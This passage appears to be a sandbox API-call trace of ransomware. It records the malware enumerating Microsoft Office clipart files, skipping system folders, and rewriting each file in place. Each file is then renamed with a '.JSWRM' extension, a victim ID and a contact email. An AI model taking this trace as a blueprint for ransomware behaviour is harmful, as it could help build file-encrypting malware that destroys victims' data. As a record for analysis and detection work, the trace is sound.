lpNumberOfBytesRead=0x345e89c*=0x6630, lpOverlapped=0x0) returned 1 [0079.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.721] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6630, lpOverlapped=0x0) returned 1 [0079.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.721] CloseHandle (hObject=0x314) returned 1 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0079.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0079.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.721] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0079.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.722] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b9a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099159.WMF", cAlternateFileName="")) returned 1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2=".") returned 1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="..") returned 1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="...") returned 1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="windows") returned -1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="recovery") returned -1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="perflogs") returned -1 [0079.722] lstrcmpiW (lpString1="J0099159.WMF", lpString2="documents and settings") returned 1 [0079.723] lstrcmpiW (lpString1="J0099159.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.723] lstrcmpiW (lpString1="J0099159.WMF", lpString2="system volume information") returned -1 [0079.723] lstrcmpiW (lpString1="J0099159.WMF", lpString2="msocache") returned -1 [0079.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099159.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099159.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099159.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099159.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099159.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099159.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.724] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27546) returned 1 [0079.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b90) returned 0x24d210 [0079.724] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6b90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6b90, lpOverlapped=0x0) returned 1 [0079.734] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.734] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6b90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6b90, lpOverlapped=0x0) returned 1 [0079.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.736] CloseHandle (hObject=0x314) returned 1 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0079.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0079.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0079.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.737] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b29, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099160.JPG", cAlternateFileName="")) returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2=".") returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="..") returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="...") returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="windows") returned -1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="recovery") returned -1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="perflogs") returned -1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="documents and settings") returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="system volume information") returned -1 [0079.737] lstrcmpiW (lpString1="J0099160.JPG", lpString2="msocache") returned -1 [0079.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099160.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099160.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099160.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099160.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099160.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099160.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.738] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15145) returned 1 [0079.738] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b20) returned 0x24d210 [0079.739] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b20, lpOverlapped=0x0) returned 1 [0079.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b20, lpOverlapped=0x0) returned 1 [0079.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.744] CloseHandle (hObject=0x314) returned 1 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0079.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.745] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bf2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099161.JPG", cAlternateFileName="")) returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2=".") returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="..") returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="...") returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="windows") returned -1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="recovery") returned -1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="perflogs") returned -1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="documents and settings") returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="system volume information") returned -1 [0079.745] lstrcmpiW (lpString1="J0099161.JPG", lpString2="msocache") returned -1 [0079.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099161.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099161.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099161.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099161.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099161.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099161.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.746] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7154) returned 1 [0079.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bf0) returned 0x205850 [0079.746] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bf0, lpOverlapped=0x0) returned 1 [0079.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.750] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bf0, lpOverlapped=0x0) returned 1 [0079.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.750] CloseHandle (hObject=0x314) returned 1 [0079.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 